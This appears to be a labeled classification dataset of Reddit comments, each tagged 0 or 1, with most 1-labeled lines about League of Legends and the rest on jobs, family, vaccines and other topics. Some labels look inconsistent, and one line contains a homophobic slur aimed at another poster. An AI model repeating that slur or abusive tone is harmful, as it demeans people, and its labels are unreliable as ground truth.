0	First, you have to realize that that is always a possibility and accept that. They definitely could have hired someone else for the position. In fact, I told them I understand if they need to.   A little background: we had huge layoffs at my site. Something around 65% of the staff was cut and, even though I'm the newest guy in my department, I was retained. They made the layoffs completely merit based and in the year I had been there I had initiated a ton of new tools that helped out my department and taken on a lot more responsibility. In our meetings I was always vocal and would voice concerns (sometimes to the point of outright disagreement with my boss) during meetings.   So, after the layoffs, my boss called and was basically telling me that he wanted me out at the corporate office because he sees my growth potential a lot better out there. I told him that I would love to move out there. I would have the same position, just at the corporate office, so this is a lateral move and I should expect minimal pay raise to basically cover cost of living.   I have to interview for the position just like everyone else, and my boss actually moves into a new role so I end up with a new one. I interview with him as well. Basically, interviewing with my new boss I get a big sense of what's going on at the corporate site and that they need someone to kind of give direction. I realize that if I move there, it is going to be me. Alright, I'm cool with that, but I also know that I have it pretty good where I'm currently at so it's going to have to convince me on paper to move.   I end up getting the job and the cost of living raise was basically exact. I shake my head and counter at around 230% of that. I didn't expect them to meet my counter at this point, but gave them justification in bullet point format. Strictly math of why I felt that I would need this amount instead of what they were offering. Told them I appreciated the opportunity and waited to hear back. Later that night, I got a call from HR and was told they would meet me somewhere in the middle (closer to their original number and not anywhere in the middle at all). I told him I would have to think about it, but I would probably not be able to make it happen at that price point. He said that this was the final offer. I once again thanked him for the opportunity and told him I would have an answer by the following day.   That next morning I sent in that I appreciate the opportunity, but I regretfully decline the position. I left a window open by saying that if they could reconsider my counter, I would love to join the team out there in January. I had radio silence until later that afternoon when my boss' boss gave me a call. We talked and she told me that it was very important to get me out there. She needed fresh ideas and someone that isn't afraid to change things if I see a better way. I told her that I really wanted the position as well, but financially I had put my counter in. I had thought about it and budgeted what I need for this move and what I need to be happy in a new environment. I told her that it was important to me to grow outside of work as well as with the company, and my counter will allow me to do that. I also said that I completely understand that transfers don't typically get what I'm asking for so there is push back from all departments and I completely understand if she couldn't make it happen. We get off the phone with her saying she is going to see what she can do to make it happen.   Two days later my old boss calls. He gets mad at me for declining the offer and I told him the same thing I told her. He responded that he would see how close he could get them to my counter. At this point I had resolved that I wanted my counter and nothing less. I explained to them why I needed it already and if they couldn't make it happen then I didn't want to transfer. So I end the conversation by telling him, "I really appreciate that you're going to bat for me too, I really do. I just want you to realize that if you guys come back with even 1% less than my counter, I will decline again. That's what I need to make this happen."   The Friday before thanksgiving I received my offer at $1 above my counter. Also, all moving expenses paid for including a large signing bonus. I signed the offer and have 4 weeks left before I move across the country to a place I've never been and start the next segment of my career.   Am I surprised they didn't just hire someone else? Not really. I have already been tested and shown to be worth merit. It costs a ton of money to go through the hiring process, train people, and then hope they work out. I'm also in a segment of the business that if they don't work out then it can cost even more money with mistakes. On the alternative, I have been saving my company money year over year and increasingly. Sometimes you have to look at your position and ask yourself if you are replaceable. That answer is easy. It is always and unequivocally "yes". Then, and especially when looking at getting a raise, you should ask yourself what it would take to have someone else come in and take over your position. Business is all about balances. Does the potential risk, cost, and hassle outweigh what you are putting on the table?   Obviously, the most important thing here is that I had a job regardless. I wasn't hungry and me taking the position wasn't necessary for me to continue on living. This is possibly the best bargaining chip and is why you should always find a new job before leaving your current one. I have shopping ability. They now know that if they don't meet my offer, I could easily take my resume to other places and continue to search for someone who might. Now they don't get me where they want me and they lose me where I'm already at. (Not anymore, because I had to sign a 2 year contract in contention with acceptance). Also, people like hiring someone already employed. Don't know why, but I think it's something on a subconscious level of sex appeal, like you are stealing someone's girlfriend because you look better.
0	OP is a faggot. You don't know shit about ADHD. I got all A's on tests, just had a hard time finishing homework.
0	When my brother came out to my mom -- back in 1990, I think -- my mom cried. She asked if he was sure. She said she loved him anyway. We were evangelical Christians so this was of course so taboo (though my mom said she knew since he was about 3). But she kept it together for the most part. In the next breath he said he was smoking now. She was SO PISSED. "Are you kidding me?? You need to stop that shit RIGHT NOW! I could wring your neck!" ;)   Fast forward all these years later. My mom loves my brother's boyfriend and considers him family. And my mom's feelings about homosexuality are completely different now. She stopped going to a church that put her child in the same group as murderers and rapists. She's much happier now and they're very close.
0	Thanks for posting, but the first post is like 8 paragraphs longer than my interest level in this story.
0	A union is an organization that is designed to protect workers rights. They exist separate from the employer and are thereby supposed to be wholly for the worker. They fight for wages and represent workers when there is a dispute between employer and employee. They require dues to be paid and in many cases you must be part of said union to work for certain employers. Seniority is the de facto unit of currency in the union (been there longer=get what ever you want). Seems like a great idea, however they have historically been found to be corrupt and have also been blamed for many business trends such as outsourcing. There is A LOT more to this, read up on the Teamsters union and the UAW for more information.
1	So Vi grew up being a total fucking badass and made a living beating the unholy shit out of people and stealing shit because fuck the police, her spirit animal was motherfucking Eazy-E. She found out the thugs she rolled with were fuckheads and changed her profession to "criminal face re-arranger" and started beating the unholy shit out of just criminals, then Caitlyn showed up. Cait was like "hey wanna do the same shit but with a badge" and Vi was like "motherfucker can I just punch the contract cause signing is for bitches".   The end.   Still
1	Initially it didn't look like this game would be any different, our teemo was feeding top to a solo trist, our ryze wasn't doing great against heimer and bottom (taric/me and sion/my pal) were getting shut down by garen and fiddle (2 silences+fear AND the garen had cleanse).   We start losing towers after we get our token top turret down since it was a 2v1 and it's looking bleak when we won one teamfight and this Ryze proceeded to 2/3v5 their team while sion and teemo backdoor'd. It was a pretty amazing turn. After a fight I wandered over to baron and caught renekton warding it so we had to postpone that. We pushed mid, turret dived them on the inhib turret turned around and did baron. Immediately following the kill we see heimer TPing onto their ward, poop all over his dick then pushed to win.
0	You should ask your physician about the flu vaccine, the IM (intra-muscular) version is an inactive vaccine. That means there are no live viral components and you cannot actually get sick from the injection. The nasal spray has a "live attenuated" viral component, meaning it is a weakened version. The idea is that it only causes a localized infection in the nose, which allows your body to build resistance. While some people cannot tolerate the most common version of the flu shot or nasal spray due to egg allergy (as the virus is incubated using chicken eggs, then inactivated or weakened to create the vaccine) there are also cell based or recumbent vaccines which eliminate this issue. The flu virus can mutate, meaning as it is passed from person to person it changes, and even a vaccinated person can become ill with a different strain. Most vaccines now are trivalent, meaning they contain protection from several of the most common strains. People who don't get vaccinated put others at risk by catching and spreading the virus and allowing it to mutate. I especially worry about people with weakened immune systems (elderly, patients on cancer treatment, small children, etc.) as a flu virus can actually lead to death. It's just as important to vaccinate against the flu as it is to vaccinate kids against life threatening diseases. It may not be life threatening to you if you contract it, but it very easily could be to the person you might accidentally pass it to. And the continual spread of the virus contributes to the ever growing number of strains being produced which makes it that much harder to make an effective vaccine every two years the CDC creates one.
0	I got this chick a job with me once. She had no experience at all, but I figured u could train her. Figured if I got her working there, I'd have a better chance to hit it, and what not. After her being there about a year, she was getting tons and tons of special treatment. More than anyone else who's been there for years. Turns out she was sleeping with the boss/owner.
0	Well sex/relationship/romantic companionship. In truth, I'm of the opinion that women make decisions on who they find attractive more on whether they're relationship worthy.   I think the whole "Friendzone" thing is a bit more complicated than I've boiled it down to above, it's based on a whole bunch of other memes such as "I'm too nice" or "She only likes jerks" and many more   My understanding of "women always picking jerks" is that many "jerks" aren't actually jerks to said women.   A few people think I must be a terrible boyfriend because I am a downright asshole to them (I'm not going to say whether they deserve it or not, I can be a total asshole). People have said (in front of me) "I hope he treats you well!" to my boyfriend in that sarcastic sense of "But I bet he doesn't!".   My understanding of "I'm too nice" is that women - and men too - can't be won purely by ticking off  boxes of things they want, for example a girl likes receiving flowers and likes movies. But that doesn't mean the core of her liking someone is them giving her flowers and taking her to the movies.   Human attraction isn't just thinking "What does my beloved desire?" and having a bunch of check boxes. You can be as nice as you want and tick as many boxes as you want but that won't make up for basic attraction. Sometimes this attraction is to the alpha male, and sometimes alpha males are genuine assholes. Sometimes they're not and I've seen tonnes of nice guys who aren't alpha males get girlfriends, so it's obviously not an implicit rule that nice guys don't get the girl because they all love jerks.   I think that's the core of the "Friend Zone", a big portion of getting sex and getting love and getting whatever you want in life is being a particular person for a particular situation, all your efforts can sometimes be for naught in such matters, it's not really fair, but in matters of the heart, is it really fair to suggest that someone should love you, when they just don't feel that way?
0	I look at America like my favorite football team, the New York Giants.  While they're not the best, they're still my favorite, and there's no other team I would rather be a fan of.
1	Dear ADC's of League,   Fuck you. You don't dictate the pace of a lane, you wait for supports to make their moves and you don't fucking tumble into their Lucian/Thresh combo, if you want to go in, let me go in first. You need to be patient, the entire reason you're in lane is to survive and farm for when we need your whiny ass. Your job is to do damage, not make plays. I don't give a shit if you 'thought' you could 1v2, you're not a god, you clearly can't when rocking a 0/1/1 KDA. Oh, and when we get into lane, yeah? PUSH THE FUCKING LANE. A huge amount of the early lane is dictated by whether or not we're pushed under turret, I can't go aggressive when they have 20 damn creeps on us, so stop trying to make it happen.
1	Another thing is , when someone put a ward on dragon, for example, and you have a pink ward there, don't rush it to kill the ward, if the creeps are pushed to your tower, the adc will be probably cs'ing under the tower and won't be able to help you if you get caught.
1	It's true you can't carry every game .. Depending on hero and enemy heroes, but most likely if you go 10-0 in 20 mins you can just march into their base, people make the mistake of "meh ill just keep farming my lane" or "ill just kill my lane over and over again" while bot lane of enemy is getting kills. You gotta know when to finish a game BEFORE the time comes. There is way to fail to carry; Not using your items. Grave 10-0? Farming botlane while team wants to fight? Fail to carry. Imagine if someone who else got them kills, they woulda at least made the imaginary 4v4 or 4v5 close fight or even ace them.   Good example of this is Stvicious who regulary aims to take the kills, know why? He knows how to use the gold and carry the game. That man won't even give you bluebuff unless he thinks you know what you are doing with it (Which by the way, should be regular standard!).   That said,
1	From what I understand(may be WAYY off), Shanon has been paying out of her pocket for the team since March when Tian Ci abandoned them and stopped paying for the team. 4 months later he/she/they(idk) is back with LLC and  claim  ownership of LMQ and the players and fire Shanon and then she can't be at LCS this past weekend until everything is sorted out.
1	idk if it'a been said or not yet, but i was just in a game where i was blitz laning with lulu. i pulled .5 seconds before she ply'd and the pull was stopped half way through.
1	Similar here, but started at more like...random streamers. moved to scarra because of knowledge, but now i usually just watch streams when i dont feel like playing i just want to laugh and DEM APHROMOO QUOTES, ye he is funny as hell
1	Yes, when every lane loses from minute one. All lanes warded and it's all the jungler's fault. Because he didn't try to gank your lane 4 times. He didn't try to help you. But you picked lanes that don't support ganks well but are easily gankable when lacking wards. He warded approaches but when he drops 500 gold to ward for every lane you blame him for not being tanky enough. I am so tired of the blame game. I don't even care about losing anymore I just dont want to be blamed relentlessly throughout the game and then have people spamming me friend invites so they can hate more.
0	The reason we started this policy is simple. An employeee comes to me requesting a pay rise. I evaluate how that employee has been going, how productive he has been, how well he has been been completing all the paperwork that is part of his job and decide if I will give him a pay rise and how much. I base this decision based purely on the individual's performance. Previously this decision has also needed to take into account everyone else in the work place of the same pay grade because as soon as 1 person gets a pay rise everyone else thinks they should get the same.  I would prefer to reward the few individuals that stand out and really help to keep us in business rather then the majority that are here just to get their weekly pay check and do the minimum required.  I have made it perfectly clear to every employee that they can come and see me anytime to get their wages reviewed and I will do the best I can to provide real feedback to why they do or do not get a pay rise and what is required of them moving on towards their next pay rise. We have people in our workshop that are paid well above what other people with the same qualifications are getting paid based purely on their performance. If we paid everyone at the same rate without their performance increasing to where it needs to be we will be out of business very quickly.
1	This thread again?   The only bug here that is at all worth making a thread about is her passive marks sometimes taking a second longer than they should to appear, and sometimes not being consumed correctly. If you used the search function, you would see that this has already been brought to the subreddit's attention.   The rest of this is QQ and really uninformed. You call her W useless, and you clearly don't understand how to use the ult properly. the suggestion to make her E work like fizz's troll pole is totally ridiculous.
1	This is kinda sad that almost no one can play them, they are just picking them because they HEARD that they are so op, sometimes it's their first time with this champ...and this happen a lot when players like that are in my team, enemy always had good malhpites, amumus...   On low elo, countering doesn't even exist, how many times someone took counter, (proly just because their team said TAKE RYZE VS FIZZ COUNTER) and this player never had play Ryze, building rabadon etc.
1	Depends what you call trolling. What I read in your situation is just some guys having bad games. Some players might be losing on purpose, but that's what I would call going on tilt. Just in my view I define things differently. It's like when people blame their ranking cause of being unlucky with terrible teammates and call it "elo hell". Imo its lack of personal skill.
0	I work with someone who defines himself a 'gamer' and he's got a long weekend of 'gaming' coming up, as I have been told about 20 times so far today.   He has no idea I also like to play, as I don't go on about it 24/7.  More often than not he talks about games but he doesn't really know what he's talking about - he will often spout a string of historical inaccuracies, outright lies or if I'm lucky just deeply tedious facts that are generally common knowledge to anyone who once touched a gameboy.   I can't be bothered to call him out on it because I don't need to advertise my knowledge on the subject to the rest of my team, who are also fond of a game or 2 but don't wear 'gaming' as a badge.
0	but that doesn't change the fact that I'm pronouncing their names wrong. Facts are facts.   Language is not so cut and dry. If the person whose name you're referring to says you're pronouncing it right, then it's right. But this is only if it's your personal name. The same rules cannot apply when A seemingly mispronounces B's name, and C corrects A, even though B prefers A's pronunciation. C does not have this authority.   >it's not wrong under any context unless if you're specifically referring to the pronunciation of the romanized word "Japan".   Let's take a few steps back. What is the ultimate purpose of language and communication? Can we agree that it is to get an idea across, to spread an idea from one person to another? I think that's fair, if it's not let me know.   If this is acceptable, then communicating "right" would be succeeding in this goal of getting your point across, agreed? Communicating "wrongly" would be to fail in getting your point across, likely through some form of miscommunication (commonly from a different understanding of what a word means). However, since the goal is to communicate between two or more people, definitions must be accepted. These definitions are fluid, and on a societal level. Society, in this context, refers to a specific locale, such as where you live, be it city or country or anywhere that language is used commonly.   Any given country, in the language that country speaks, has a term for itself AND a term for many other countries. The United States calls itself that (or America, or a variety of similar, really), and we call Japan "Japan."  Japan, on the other hand, calls itself Nihon or Nippon, and likely has it's own names for America that an American would be unfamiliar with.   To communicate "correctly" one must use terms the society they are in is used to, if we don't, then it is "incorrect." I assert that English speaking countries/locales are not used to calling Japan Nihon, because that is not the English word for the country. Thereby, to call Japan Nihon would not assist in getting a point across, and in fact may make it harder to do so if your audience does not know that word. This is therefore an incorrect means of communication.   This is not to say that Nihon is incorrect in  all  contexts, as it would obviously be the correct term in Japan, where the term would be understood. Likewise however, just because it is correct in one context doesn't mean it is correct in all.
1	Just apply? E.g. Dignitas is looking for a content manager right now.   If you are proficient as a technician, commentater, host, pro gamer or actor just grab your CV and fling it at all the major Esport organizations and finally check the open positions at the riot homepage.
1	Well, I actually proved I didn't deserve it by logging report spam in a GD forum. Did riot show up with logs to prove me wrong? Nope because they don't exist. Do I get report spammed a lot? Yes. Infact I get it nearly every game because I'm that guy catching you out when you "just wanna farm." While your friends may be jerks, I am not one. I am one of the most positive summoners you've ever met. I'm also one of the biggest lane bullies, thus, my constant reporting. People get mad when they get crap on constantly. I know, I used to be like them till I became  GOOD . I took the time to watch streams and pick up good habits.
1	This is old, so I don't know if their stance on this is still the case but this is a post I remember reading.   >We debate this one a lot internally.   >In the short-term, I can say that we don't think that changing the format right before the final tournament makes a lot of sense.   >That being said, in the long-run, we could go 6, or we could go 8. We lean 6 at present. That could change.   >The reasoning here is pretty simple. Bans get used for 4 purposes in general, 3 of which have a meaningful impact on tournament play:   > Reason 1: To remove champions that players perceive are 'must pick or ban' or 'S tier'   >Reason 2: To ban your opponent's best player's signature champion (e.g. banning sivir vs doublelift in the NA regionals)   >Reason 3: To eliminate backbone champions from strategies that they are poor at dealing with, or to eliminate counters to their niche strategy.   >Reason 4: Because you hate playing vs a particular champion (e.g. Shaco) (NOT RELEVANT TO COMPETITIVE PLAY)   > We think that #1 is important. We think that #3 CAN be helpful. We aren't a big fan of #2 , though this somewhat becomes a debate between 'slightly more champion diversity' and 'wanting to see top players play their signature champion'.   >Right now, there are between 1 and 6 'S Tier' Champions depending on who you watch play -- At the NA regionals, it appeared to be some combination of Yorick(Yeah, he has some challenges), Alistar, Shen, Karthus, Malphite and Morgana (I would say that's in roughly descending order from highest to lowest priority). So today, most of the time, teams are banning maybe 2 champions to knock out S tier picks, with 1 ban going to signature champion denial or strategy denial.   >If we go to 8 bans instead of 6, we increase the amount of 'denial' bans by 100%. I'm not really sure we are better off with more denial bans. I for one want to see Froggen play Anivia and Voyboy play Olaf, and honestly, you would see that significantly less with 8 bans.   >Additionally, when the live design team succeeds in getting these 'must ban or plays' down more, which they regularly do, you will see more bans go to denial bans, which again, I think is dangerous. I don't feel that most of our current 'must bans' are truly 'must bans', but supposing we shifted that perception, at 8 bans and only 1 "must ban" per team, you'd see each team banning 3 characters for specific advantage -- so you could shut down all of their signature champions. Additionally, 8 bans raises the potential for some weird edge cases around banning a bunch of one role (such as support, jungle, etc).   >That's why we are waiting this out. As the perceived "S tier" champs oscillate between low numbers and average numbers, we will get a better feel for how much denial banning hurts the game vs enhances the game, and can make better long-term decisions. Right now, the benefits of going to 8 are somewhat hazy, so we are being conservative.   >Questions asked:   > Zileas, as you add champions, you must have more bans, right?   >We don't really agree with this -- we feel the minimum bans are related to the number of S tier champions, which can come from new releases, but honestly, is something we are getting better at managing with time. It's very conceivable we could have 50% more champions but have half the S tier champions.   > I disagree with your S tier list / You are acknowledging that those champs are OP / etc   >I based this off of what happened at the NA regionals generally. I am judging this based on what the pros do and how it impacts picks and people getting their signature champions -- ultimately that's more 'true' for setting bans than my general opinions on play balance. For the record, the only champion on there I'm 100% confident needs some work is Yorrick. The rest will of course be evaluated like we always do on this stuff, and touched when we need to.   > Zileas, are you saying the game is primarily balanced for eSports?   >LoL is a competitive game, and we spend a lot of effort to optimize to make for good high-level play. We also spend effort to make mid-tier play good, but it's a different standard. We will always nerf something if it is destroying ANYONE's experience (e.g. if Twitch was running 75% win rate among 80% of our players, we'd definitely nerf him), but we make detailed, careful, precise nerfs and buffs to optimize for top-level play. That's a pretty standard balance approach that I feel like is used in all competitive games, and has served us well thus far.   > If you guys think this, why do you have bans at all?   >Things often become fine in moderation. There's some definite benefit on diversity we are getting, and the negatives are not coming through that much. And, by eliminating perceived S-tier, we remove a lot of downsides around people feeling the tournament was hosed because of [insert OP champion here]. I doubt we'd ever go below 6 bans, but I guess if there was a long period of no 'must pick or ban' perception, we might.   > Why don't you heave interwoven bans (e.g. pick pick ban ban pick pick)   >This is a fairly complex topic. There are two short answers. First, we always want more gameplay, but we value gameplay in the game more than gameplay in champion select. If the most important decisions are loaded more in champ select than the game, the game starts to become rock-paper-scissors. The second answer is that if you add second step bans, those bans will 95% go to denial bans (blocking signature champions and strategy counter champions). The interleaving just magnifies the power of denial bans.   >The more nuanced answer is that League is opposed to 'rock paper scissors' style design. That's why we don't have hard immunities in large amounts, and why we don't have a ton of true hard counter champion picks. However, as you add more denial bans, you can start to create situations where this starts to become the case, especially if you can do it later in the pick phase and isolate around a specific role. If you are in a situation where you are very unlikely to be able to apply skill to prevail against a 'similar skill' opponent before the game started, the game just stopped being skill-based. So, we seek to avoid those situations as much as we can.   >I'm sure a common response to this will be --'Even if you don't need them/they have some side effects, doesn't it make champion select more strategic?'. I think it does to a tiny extent (It's a single pick in time), and has the potential to introduce more rock-paper-scissors picks. This is all fairly relative though -- there WILL be times where you can ban the counters and enable something, I am just making the argument that in aggregate, doing this will make the game more rock-paper-scissors in champion select, and in aggregate, will reduce the # of team-level strategies.   >But, we'd rather have people lose from playing poorly (or the other team playing awesome), than we would have them lose at champion select, and I feel like that potential is higher as we add bans. So, in summary, I'd rather keep the gameplay in the game than at champion select. You make dozens of choices in execution and prioritizing around your comp once in the game, and only do it once in champ select.   > Doesn't having interwoven bans increase the # of viable team-level strategies?   >It's hard to know 100%, but I think the evidence points to it being likely to reduce our team-level strategies. A lot of our powerful but slightly less common strategies (e.g. variants of sustain/poke with double trap, or double invade, and so forth) are pushed into relevance by a smaller number of characters than 'primary' strategies. If you can do this, primary strategies that can draw on a LOT of different characters will be the ones that survive. Being able to 'counter' those with an intermittent ban will tend to either result in people not trying them, or getting blown up in champion select and having a match of rock-paper-scissors play out.   >We have several goals with play balance right now, but one which is steadily producing better and better results, is the idea that we need to push more variants of team-level strategy into viability. This is not the '1:1:2:jungle" thing, as that encapsulates about 10% of the meta, it's more about making sure there are multiple flavors of early, mid, late game strategy, different approaches to valuing types of plays, and different comps to accomplish the same things, and that all of these comps play out in an interesting way against each other. The meta is healthiest ultimately when players can throw a bunch of different things at each other -- AND have them be interesting, balanced games. Banning at champion select effectively to them produce a situation where your niche strategy is pushed into viability via a rock-paper-scissors effect is just not good gameplay in our view.   >Bottom line -- I think the mind games possible in a more elaborate ban phase are really interesting, but it comes at a cost in the actual game potentially. It's really a question of where do you want the gameplay occurring? In champ select, or in the game.   -[Zileas](     From my perspective;   IMO DotA has a higher emphasis on picks and bans as a  strategic  aspect than Riot does.   While, from what I could understand, LoL bans are mainly for  removing S-Tier champions  from competitive.   And just for the
1	You may not eat a ridiculous amount, but I'm just saying if you are exercising regularly, then losing wait should work if you pay close attention to how much you should be eating. I cant tell you how much you should or shouldnt be eating, but just try to eat less each serving and drink a lot of(or ONLY) water. Soda is a huge one for me and a lot of people but I noticed you said sweets. I don't know what to tell you about that other than you don't need it. It's not food, it's pleasure. Soda and sweets you should just not be consuming on a regular basis if you arent at a comfortable body size and you are trying to change it.
1	laught so hard, was thinking the same.
0	People of the United States v. Confession Bear (2013). This was a landmark case in the fight for the use of online Confession Bears as evidence in the court of law. The case was brought to the attention of the Supreme Court by a person named OP who challenged a judge's verdict of a life sentence based on the evidence of an online Confession Bear. The defendant, OP, pleaded karma as his defense. He was sentenced to a life in prison, as mentioned above. He then challenged this sentencing by appealing to the Supreme Court. The Court upheld the judge's verdict 5-4 and set a precedent that memes are allowed as evidence in the court of law. The dissenting opinion wrote that you can't believe anything on the internet, especially when it comes in the form of a meme.
0	Because of the display of interest, I will jot down some of the more potent memories:   My father had winter and summer visitations. 3 weeks in the winter, 2 and a half months in the summer. My sister and I went to Wisconsin for the winter break, and after this visit, my mom was moving us to Arizona. My father fought hard and did not want us moving from Chicago to Arizona. Combined, my parents flushed about 50k in a custody battle. In the end, the asshole step-dad mentioned above went into court with my mother and testified that he had secured, as he put it when he told me this story, a "hush hush government engineering gig". This "hush hush" gig never existed. He lied in a court of law, and the judge bought it without vetting what he was being told at all. That is how I ended up in Arizona.   Based on his testimony and the fact that my sister and I refused to go into court and declare "which parent we chose", my mother was awarded permission to move us to Arizona.   The first 2 weeks were the same situation as any visit in that era. Cousins and Aunts and Uncles visiting frequently (my father did and still does live with his mother). The family of my surname gathered around the dining room table each night and engaged in fierce conversation about what a whore my mom was, frequently referring to the fact that my sister and I had her genes, so it was very important to keep us around to try to work against the rotten genetics we had to keep us from becoming the type of trash that my mother was. My sister and I were not allowed to join these conversations because we were "only children", no. We got to sit in the living room 2 feet away and just listen.   As we entered into the final week, things started getting somber. Everyone should have been getting excited for Christmas, but instead, everyone got angrier and angrier at my mother because the day after Christmas, we were to be flown "half way across the country into the unforgiving desert" (a tagline that became a twisted joke in the years that we lived in Arizona).   That Christmas was joyless. My grandmother scowled. My grandpa was silent. My dad was on the verge of tears the whole time, and my aunt and uncle did nothing but find opportunities to get back to conversations centered on bashing my mother.   After hearing about my "tainted genetics" for a couple weeks, Christmas came. I watched as my cousin opened her gift. It was 1000 dollars total, in 5 dollar bills, strewn through 10 layers of boxing. I got a set of Ghostbusters pajamas that were 2 sizes too small and some coloring books. Both from the church food shelter my grandma "volunteered" in.   Morning after Christmas, I remember being woken up at 3 in the morning because we needed to prepare for our flight at 7:30.   I remember a crippling sense of sadness and being overwhelmed with the urge to just fall on the ground and sob forever. This didn't come from any place internal, it was all in the faces and the tones in the voices of the adults around me.   We got put into the car, and as my dad was closing the door, he had a "breakdown" moment and closed the door by pounding on the window "hulk smash" style. I remember thinking "if that glass would have shattered, I'd have glass imbedded in my skin, and if my finger were still in the doorway, i wouldn't have a finger anymore".)   We drove to the airport, sat there for 2 and a half hours, unable to talk, just feeling the ferrets in our stomachs burrowing around and tearing our intestines to shreds.   This became the routine for the next 3 years. Then one year, my father went to get the documentation to follow us down to the terminal, and I took him aside. I said "Dad, we are about to say goodbye one way or another. I'd prefer to say goodbye at security and be done with it than to drag this out for another 2 hours. I love you, I will see you again soon, but let's stop with this torturing of ourselves". To this day he still tells me whenever he shares this nugget of wisdom with others, complete with citation back to his child, on how to "do goodbyes".   Got on the plane, arrived in Arizona, and got filled in on the fact that in the 3 weeks, neither my mother nor step father had found a job (imagine how confused I was when I thought the step-dad had a prestigious government job and I landed to be told he was jobless). They had been kicked out by the friends they intended us to stay with. They were renting a house that rent had not been paid for in 2 months. "But don't worry, we maxed our last credit card to buy a new tree and presents!"   I'll stop here. I could (and possibly may some day) quite literally write a novel.
1	That's already been dealt with though.  The point of this post now is the fact that Riot is basically removing ALL importance of mid game.  I've noticed that it is a bit frustrating to be supporting an ADC, we win lane really hard, but then after shutting them down to like, 1/9 or something, they come back because my team accidentally gets caught or something.  I'm not okay with the fact that we COULDN'T come back at all before these changes, but I also feel like if they remove the importance of early game completely, then what's the point of playing the early game champions like LeBlanc?   I really like the idea behind Riot wanting to stop snowballing, but nerfing early game to the point where it doesn't matter isn't the way to go about it in my opinion.  When you can just turtle the game out for 50+ minutes and still win even though the enemy team is 15k gold ahead and 20+ kills ahead of you, it's not right.  Snowballing does have a place in LoL, however not like it did before.   I think that in order for snowballing to work right, is that if you win laning phase, good for you, they can still come back.  However, if you win 9/10 team fights, the other team shouldn't have the ability to win just by turtling everything out.  It's ridiculous at that point, because if you literally get  that  far ahead, but they still win because they had more tanks to turtle out the team fights or sieges, I don't feel like that's a good idea.
1	But Wickd, you're a way better player than we are, so this doesn't count!"   WELL MAYBE THERE'S YOUR PROBLEM. Enough players have done this to show that if you're "good enough", you can carry yourself to your "true" Elo without too much trouble. Saintvicious did it when he was hacked, TSM did it when they switched to EU-W server. Countless players do it every day, and you can too.   My problem with the concept of Elo Hell is that it is an incredibly vague term/mindset used to justify why YOU belong at a higher ranking and that the only reason you are not is because everyone else is holding you back. If you think about it, that's a pretty shitty mindset to have which will not only contribute to the toxic game environment that so many complain about, but also stunt your growth as a player.   I've had my fair share of leavers and trolls, but I can't only blame them for why I'm 1300. I'm only 1300 because as a player, I have a lot of improving to do. I used to have the same mindset, which is actually partly why I didn't do so well in my early ranked. I thought I was hot shit and that it was only my incompetent teammates screwing me over. One day, my 1750 Elo housemate let me play a game on his account, and needless to say, I got STOMPED on. This really put things in perspective, as I realized that maybe I really do belong where I am. I'm not hot shit, and if I want to raise my Elo, I have a lot of improving to do.   Sure, Wickd is a 2k Elo player, of course he carried himself out. But what about the people who are "only" 1800? What about those that are 1600? 1400? They all had to deal with the same shit you did, but they somehow managed to climb their way out, so why can't you?   Do I believe in Elo Hell? Yes, but what differs here is that I define it as the approximate range in which most players have this crappy mindset that I mentioned above. It's not about player skill, but about arrogance, attitude and the tendency to blame everyone else. So in essence, you are the ones not manufacturing this so called "hell", but also perpetuating it. Once you realize this, not only will you improve as a player, but you will also have more fun, and hopefully make this community that much better.
0	I completely fail to see how forcing dumb fuck binder checks furthers your education...   I mean sure if that helps you remember things then do so yourself.   I will be using the saved hours actually LEARNING shit instead of meddling in bull shit papers and notes I've already been tested on.
1	A pretty good portion of this sub-reddit claims to be in "ELO Hell", you aren't going to get a very positive response. I more or less agree with your post, the same held true in HoN and to a lesser extent the lower SC2 brackets.   When you are unable to influence the game enough to win more than you lose (out of a high number of games) you have reached your current true ELO. Complaining about bad teams will not make you any better, playing more games and taking advantage of the other team's idiots will.
1	With some proper formatting:   > I'm bored so I'll do some math...   >Assume you're a level 12 vayne and you already have blade of the ruined king and zerk greaves and +35 attack damage from runes/masteries/doran's/whatever and +4% attack speed from masteries.   >Your next item could be either infinity edge or trinity   >assume you maxed tumble first, you have four points in silver bolts, and you tumble once for every 2.5 seconds of strait stand still auto attacking and you get a trinity proc everytime you tumble. assume enemy has 1500 max health for the purposes of silver bolts and your opponent has 100 armor after whatever so i'm just going to punch in silver bolts damage as double the value of regular damage.   >Your auto attack DPS is calculated as:   >.658 [base vayne attack speed]    1.981 [bonus attack speed %]   ( 149 [your attack damage] + (.07   1500 + 50)   2/3 [silver bolts damage]) .... multiply that by 2.5 and then add 149   1.5 [tumble damage] + (.07   1500 + 50) * 2/3 [silver bolts tumble proc]   >so crunching the numbers, your damage over 2.5 seconds with a tumble + some autos is 1149.12.   >Add triforce and do the math again:   >.658 [base vayne attack speed]    2.281 [bonus attack speed %]   ( 179 [your attack damage]   1.10 [crit] + (.07 1500 + 50)   2/3 [silver bolts damage]) .... multiply that by 2.5 and then add 179   1.6 [tumble damage adds with crit] + (.07   1500 + 50)   2/3 [silver bolts tumble proc]+178[Sheen damage]   >crunching the numbers, your damage is now 1694.28... which is 545.16 more than it was without trinity force.   >next, do it with IE instead of triforce:   >.658 [base vayne attack speed]    1.981 [bonus attack speed %]   ( 219 [your attack damage]   1.375 [crit & crit damage bonus] + (.07   1500 + 50)   2/3 [silver bolts damage]) .... multiply that by 2.5 and then add 219   1.875 [tumble dmg/crit/crit dmg] + (.07   1500 + 50)   2/3 [silver bolts tumble proc]   >your damage is 1831.98... which is 682.86 more than it was before.   >Since IE just adds pure damage, we should divide 3700g by the 682.86 damage that IE adds to determine the value of "damage"... each point of "damage" in this math experiment is worth 5.418g... using this analysis, trinity force adds 2954 (rounded) gold worth of damage, and it costs 3628g.  That's 674g that needs to be made up in other stats on the item.   >So the question: is the 250 health, 200 mana, 8% move speed and move speed proc on trinity force worth 674g?  If yes, it's worth buying tri on vayne for the mid game at least.  For late game infinity edge will scale better (you can pick up IE eventually anyway, it's not like tri is slot inefficient.. could replace PD or something in your build)... i'm too lazy to do late game math right now, anyway.   >
